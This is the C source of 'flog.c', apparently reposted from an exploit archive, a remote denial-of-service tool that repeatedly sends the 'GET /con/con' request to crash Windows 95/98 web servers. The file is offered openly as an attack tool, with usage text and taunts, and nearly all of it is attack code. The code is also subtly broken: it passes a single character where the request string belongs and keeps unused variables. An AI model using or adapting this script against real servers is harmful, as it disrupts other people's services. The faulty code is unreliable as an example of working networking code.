Flog.c crashes Win95/98/se webservers by sending GET /con/con HTTP/1.0.
a3f74e82a510d0b46f247c9d9e3f13987429393849fd1e3158d7cf980d73b61e/*
* [flog.c]
* A remote DoS that affects all Win95/98/se machines running
* a webserver using the unexisting /con/con exploit.
*
* by Infernal Pulse
* infernal@hackdesk.com
* http://www.hackdesk.com
*
* Greets
* R00T-dude - For the idea.
* All of the Hack Desk staff...
*
* NOTE: Does not work on Windows NT 4 or Windows 2000 web servers.
*
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin,crap=0;
char conbuff[1024];
char *buff;
buff = "GET /con/con HTTP/1.0\n\n";
if (argc<2)
{
printf("\n [flog.c] by Infernal Pulse ");
printf("\n Exploits the /con/con vulnerability on Win9x webservers. ");
printf("\n Usage: %s host",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t flog.c by Infernal Pulse \n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t Checking webserver version... \n");
getchar();
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t Executing code... *fl0g* *fl0g* *fl0g* \n");
getchar();
while(count++ < 97)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("fl0g - error");
for(numin=0;numin < 1024;numin++)
{
conbuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, conbuff, sizeof(conbuff),0);
cgistr = strstr(conbuff,foundmsg);
printf("Finished fl0ggin'!\n");
close(sock);
}
if (crap){ printf("fl0g dem Windows kiddies!\n");}
}
/* EOF */
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed